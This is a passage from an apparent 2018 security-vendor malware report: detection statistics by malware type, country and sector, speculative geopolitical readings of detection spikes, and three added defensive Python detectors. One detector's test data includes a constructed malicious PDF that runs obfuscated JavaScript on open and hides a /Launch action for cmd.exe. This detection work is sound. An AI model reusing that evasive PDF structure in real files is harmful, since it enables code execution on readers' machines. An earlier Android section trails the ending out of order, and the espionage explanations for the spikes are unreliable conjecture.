And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other programs and devices by modifying them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft rates Ramnit as a "severe" threat; it infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries, especially developing ones, were affected.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the wooden horse of Greek mythology because their malicious functionality hides inside seemingly useful or benign programs. Typically a Trojan grants a remote attacker the same rights and privileges as the local user, and it can be used for many kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the administrators group under the guise of a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
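The behavior Microsoft attributes to Starter, a new account that is immediately made a local administrator, is easy to hunt for in the Windows Security log. The Python below is an added example written for this page, not code from Comodo or from the report: it reads Security events 4720 (user account created) and 4732 (member added to a security-enabled local group), flattened to JSON lines as an export might produce, and alerts when a freshly created account lands in BUILTIN\Administrators within a short window. The log records are constructed for the example, the field names follow the EventData of those two events, and the five-minute window is an assumed threshold, not a value from the report.

```python
import json
from datetime import datetime, timedelta

# BUILTIN\Administrators. Match on the SID: the group's display name varies by
# locale (Administrators, Administratoren, ...), the SID does not.
ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample: five Security-log records flattened to JSON lines. Field names
# follow the EventData of 4720 (account created) and 4732 (member added to group).
# Record 1+2: an account created and made admin one second later (the Starter pattern).
# Record 3-5: an admin creates a helpdesk account, adds it to Remote Desktop Users
# (S-1-5-32-555), and only hours later to Administrators.
SAMPLE_LOG = """\
{"EventID": 4720, "TimeCreated": "2018-06-04T09:15:02", "SubjectUserName": "jdoe", "TargetUserName": "rsvcacct", "TargetSid": "S-1-5-21-1-2-3-1105"}
{"EventID": 4732, "TimeCreated": "2018-06-04T09:15:03", "SubjectUserName": "jdoe", "MemberSid": "S-1-5-21-1-2-3-1105", "TargetSid": "S-1-5-32-544"}
{"EventID": 4720, "TimeCreated": "2018-06-04T11:40:10", "SubjectUserName": "itadmin", "TargetUserName": "helpdesk2", "TargetSid": "S-1-5-21-1-2-3-1106"}
{"EventID": 4732, "TimeCreated": "2018-06-04T11:41:00", "SubjectUserName": "itadmin", "MemberSid": "S-1-5-21-1-2-3-1106", "TargetSid": "S-1-5-32-555"}
{"EventID": 4732, "TimeCreated": "2018-06-04T16:02:00", "SubjectUserName": "itadmin", "MemberSid": "S-1-5-21-1-2-3-1106", "TargetSid": "S-1-5-32-544"}
"""


def parse_events(text: str) -> list:
    """Parse JSON-lines records into dicts with a datetime TimeCreated, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["TimeCreated"] = datetime.fromisoformat(ev["TimeCreated"])
        events.append(ev)
    return sorted(events, key=lambda e: e["TimeCreated"])


def find_rogue_admins(events: list, window: timedelta = timedelta(minutes=5)) -> list:
    """Alert on accounts added to Administrators within `window` of being created.

    A human provisioning an admin account rarely does both steps within seconds;
    malware that plants its own backdoor account almost always does.
    """
    # Index creations by the new account's SID; 4732 reports the member by SID too.
    created = {e["TargetSid"]: e for e in events if e["EventID"] == 4720}
    alerts = []
    for e in events:
        if e["EventID"] != 4732 or e["TargetSid"] != ADMINISTRATORS_SID:
            continue
        creation = created.get(e["MemberSid"])
        if creation is None:
            continue  # pre-existing account: not the pattern being hunted here
        delta = e["TimeCreated"] - creation["TimeCreated"]
        if timedelta(0) <= delta <= window:
            alerts.append({
                "account": creation["TargetUserName"],
                "sid": e["MemberSid"],
                "created_by": creation["SubjectUserName"],
                "elevated_by": e["SubjectUserName"],
                "seconds_between": delta.total_seconds(),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_admins(parse_events(SAMPLE_LOG)):
        print(f"new local admin {alert['account']} ({alert['sid']}) elevated "
              f"{alert['seconds_between']:.0f}s after creation by {alert['created_by']}")
```

With the default window only the one-second sequence is reported; widening the window to a working day also surfaces the helpdesk account, which is the usual trade-off between catching slower manual abuse and paging on routine provisioning. Correlating on the SID rather than the account name matters because 4732 frequently records the member name as "-" and only the SID reliably.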
5.2.4 Exploits
Exploits are software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target computer's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
Exploit detections are comparatively rare, because the vulnerabilities they target are typically patched soon after they are discovered; the exploits that remain in circulation work only against systems that have not applied those patches.
In Q2 2018, the majority of exploits detected by Comodo targeted a favorite hacker vehicle, Adobe Portable Document Format (PDF) files, a format created in the early 1990s to present documents consistently regardless of application software, hardware and operating system.
Japan and India were the two countries where Comodo detected the majority of Exploit activity in Q2 2018, with Japan clearly experiencing the most persistent challenges.
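Because the quarter's exploit detections were dominated by PDF files, a first triage step is to look for the PDF features that exploit documents depend on: JavaScript and launch actions, actions that fire on open, and the #xx name escapes and compressed object streams used to hide them. The Python below is an added example for this page, not Comodo's tooling: it scans a PDF byte string for those names, inflates FlateDecode streams so that names hidden in object streams are scored too, and returns a simple score. The two sample documents are constructed inline, and the name weights and the score threshold of 4 are illustrative choices rather than anything calibrated on the report's data.

```python
import re
import zlib

# Weights for PDF name objects that commonly carry exploit or social-engineering
# payloads. Illustrative starting point, not a calibrated model.
RISKY_NAMES = {
    "/JavaScript": 3, "/JS": 3, "/Launch": 3,   # script execution or program launch
    "/OpenAction": 2, "/AA": 2,                  # actions that fire without a click
    "/RichMedia": 2, "/EmbeddedFile": 1,         # Flash and embedded-payload carriers
    "/XFA": 1, "/URI": 1, "/ObjStm": 1,          # forms, links, object streams hiding names
}

# A name runs from "/" to the next whitespace or delimiter (ISO 32000-1, 7.3.5).
NAME_RE = re.compile(rb"/[^\s/\[\]<>(){}%]+")
# Stream bodies sit between the "stream" and "endstream" keywords.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def decode_name(raw: bytes) -> str:
    """Undo #xx escapes: legal in any name, and a favourite way to hide /JavaScript."""
    unescaped = re.sub(rb"#([0-9A-Fa-f]{2})",
                       lambda m: bytes([int(m.group(1), 16)]), raw)
    return unescaped.decode("latin-1")


def inflate_streams(data: bytes) -> list:
    """Return the bodies of every stream that zlib can inflate (FlateDecode)."""
    bodies = []
    for m in STREAM_RE.finditer(data):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # image data, another filter, or a deliberately corrupted stream
    return bodies


def scan_pdf(data: bytes) -> dict:
    """Count risky names in the file and inside its inflated streams, then score."""
    counts = {}
    obfuscated = 0
    for chunk in [data] + inflate_streams(data):
        for m in NAME_RE.finditer(chunk):
            raw = m.group(0)
            name = decode_name(raw)
            if name in RISKY_NAMES:
                counts[name] = counts.get(name, 0) + 1
                if b"#" in raw:
                    obfuscated += 1  # nobody escapes /JavaScript by accident
    score = sum(RISKY_NAMES[n] * c for n, c in counts.items()) + 2 * obfuscated
    return {"names": counts, "obfuscated": obfuscated,
            "score": score, "suspicious": score >= 4}


# Constructed samples (not real files): a plain two-object document, and one that runs
# JavaScript on open, escapes the action name, and hides a /Launch action inside a
# compressed object stream where a plain string search would never see it.
BENIGN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Count 0 >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")

_hidden = zlib.compress(b"3 0 obj << /S /Launch /F (cmd.exe) >> endobj")
MALICIOUS_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction << /S /J#61vaScript "
                 b"/JS (app.alert(1)) >> >> endobj\n"
                 b"4 0 obj << /Type /ObjStm /N 1 /First 0 /Filter /FlateDecode /Length "
                 + str(len(_hidden)).encode() + b" >>\nstream\n" + _hidden
                 + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("malicious", MALICIOUS_PDF)):
        print(label, scan_pdf(doc))
```

The scanner is a triage filter, not a verdict: legitimate forms use /AA and /XFA, and signed documents embed files, so the score should route a sample to a sandbox or a proper parser rather than block it outright. It also stops at one layer of compression, so a stream inside an inflated object stream is not inflated again.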
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Constructors, Packers, Email Flooders, Virtual Tools and Jokes.
5.3.1 Constructor
Constructors are applications that can be used to generate malware files automatically.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft rates this program a "Severe" threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware is malicious executable code that has been hidden or obfuscated by compressing ("packing") it inside a larger, seemingly innocuous program or data stream. The hostile code can even take the form of scripts. The packed data is usually accompanied by its own decompression stub, or is built as a self-extracting archive, which recreates the original code from the compressed form at run time and then executes it. Encryption may also be layered on to conceal the malware from security software.
MUPX, a modified build of the "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous file formats and operating systems; it leverages the open-source UCL compression library, whose decompressor is only a few hundred bytes of code.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
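Packed binaries can be recognized without unpacking them, and the "modified UPX" case is exactly where a rule based on section names fails: strip the UPX0/UPX1 names and a name-based rule is blind, while the layout (an empty section reserved for the unpacked image next to a small, high-entropy section holding the compressed image plus stub) is still there. The Python below is an added example for this page, not Comodo's detection logic: it parses the PE section table with the standard library, then flags known packer section names, empty sections with a large virtual size, and sections whose Shannon entropy exceeds 7 bits per byte. The three sample images are constructed inline as bare PE skeletons (they are not runnable programs), the list of packer section names is a starting point rather than a complete one, and the 7.0 entropy threshold is a common rule of thumb, not a value from the report.

```python
import hashlib
import math
import struct
from collections import Counter

# Section names left behind by common packers. A renamed ("modified") UPX build
# defeats this list, which is why the layout and entropy checks below do the real work.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".themida",
                        ".vmp0", ".vmp1", ".petite", "MPRESS1", "MPRESS2", ".nsp0", ".nsp1"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~0 for padding, roughly 4-6 for native code, near 8 for compressed or encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image: bytes) -> list:
    """Walk the PE section table; returns (name, virtual_size, raw_size, raw_bytes) per section."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                   # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_header_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_header_size                   # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                              # IMAGE_SECTION_HEADER is 40 bytes
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, rsize, rptr = struct.unpack_from("<IIII", image, off + 8)
        sections.append((name, vsize, rsize, image[rptr:rptr + rsize]))
    return sections


def triage(image: bytes) -> dict:
    """Return packer indicators found in the section table, name-based and layout-based."""
    findings = []
    for name, vsize, rsize, raw in parse_sections(image):
        if name in PACKER_SECTION_NAMES:
            findings.append(f"{name}: known packer section name")
        ent = shannon_entropy(raw)
        if rsize == 0 and vsize > 0:
            # UPX-style layout: a section with no bytes on disk, reserved for the unpacked image
            findings.append(f"{name}: no data on disk but {vsize:#x} bytes reserved in memory")
        elif ent > 7.0:
            findings.append(f"{name}: entropy {ent:.2f}, compressed or encrypted")
    return {"likely_packed": bool(findings), "findings": findings}


def build_pe(sections: list) -> bytes:
    """Assemble a minimal PE32 skeleton around (name, virtual_size, raw_bytes) triples.
    Constructed test data only: the optional header is zero-filled and the file cannot run."""
    opt_header_size, e_lfanew = 0xE0, 0x40
    data_ptr = e_lfanew + 4 + 20 + opt_header_size + 40 * len(sections)
    hdr = bytearray(b"MZ" + b"\0" * (0x3C - 2)) + struct.pack("<I", e_lfanew)
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_header_size, 0x102)
    hdr += b"\0" * opt_header_size
    body, vaddr = b"", 0x1000
    for name, vsize, raw in sections:
        hdr += name.encode("ascii").ljust(8, b"\0")
        hdr += struct.pack("<IIII", vsize, vaddr, len(raw), data_ptr if raw else 0) + b"\0" * 16
        vaddr += (max(vsize, len(raw)) + 0xFFF) & ~0xFFF
        data_ptr += len(raw)
        body += raw
    return bytes(hdr) + body


def noise(n: int, seed: bytes = b"mupx") -> bytes:
    """Deterministic stand-in for compressed data (a hash chain), so the example needs no files."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed samples: a stock UPX layout, the same layout with the names scrubbed
# (the "modified UPX" case), and an unpacked binary with repetitive code bytes.
CODE = b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57\x8b\x45\x08" * 256
UPX_SAMPLE = build_pe([("UPX0", 0x8000, b""), ("UPX1", 0x1000, noise(4096)), (".rsrc", 0x200, b"\0" * 512)])
MUPX_SAMPLE = build_pe([(".text", 0x8000, b""), (".rdata", 0x1000, noise(4096)), (".rsrc", 0x200, b"\0" * 512)])
CLEAN_SAMPLE = build_pe([(".text", len(CODE), CODE), (".data", 0x200, b"\0" * 512)])

if __name__ == "__main__":
    for label, sample in (("upx", UPX_SAMPLE), ("mupx", MUPX_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, triage(sample))
```

Against the renamed sample the name check reports nothing, but the empty .text section and the near-8-bit .rdata section are still flagged, which is the point. On real files expect benign hits from large embedded compressed resources and installers, so treat the output as a list of findings for a human or a sandbox rather than a verdict.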
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it, or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country in which Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that modify or alter malicious files so that they avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is just what the name says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period.
Such programs are typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and run such software on purpose. Comodo nonetheless detects and flags them as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application category is alarming in that users often install these programs inadvertently during ordinary computer and Internet activity. Examples include common adware programs, widely disseminated images and videos, dialers, jokes, gossip apps and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, change the search provider and/or perform other actions the user might not have intended. Such bundles include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US was far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed together with additional malware that users install inadvertently.
This malware type is a bit different in that while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section, let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in just one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", another name for the "Zeus" Trojan that has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social-engineering scheme that falsely claims the target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out. What happened on that day in the US, and what might help to explain the surge in malware activity? On March 13, US President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for the dramatic rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements: many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies would then have set about fulfilling those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to better connect with the outside world. Comodo researched the detected malware further and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics and national security affairs, are now mostly conducted online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral events. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this Virus activity in Finland showed that it took place almost exclusively in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several significant new trends that are likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks to be revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine-learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Sonvpay covertly subscribes infected devices to WAP and SMS services in order to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option; if the user taps this button, the malware begins working in the background, subscribing the user to services she did not order.
It reaches victims under a variety of disguises, named below.
4.1.11 CoinHive
The last entry in our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which improves its mining capability. It is disseminated via the counterfeit apps listed below, but one of its vectors is especially interesting.
Disguises of CoinHive:
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer in order to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it on the victims' machines. She is not aware, however, that another cybercriminal has earlier infected CoinMiner itself with CoinHive. So the first attacker is also a victim: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
[Chart: Android-targeted malware in April]
4.2.2 May 2018
[Chart: Android-targeted malware in May]
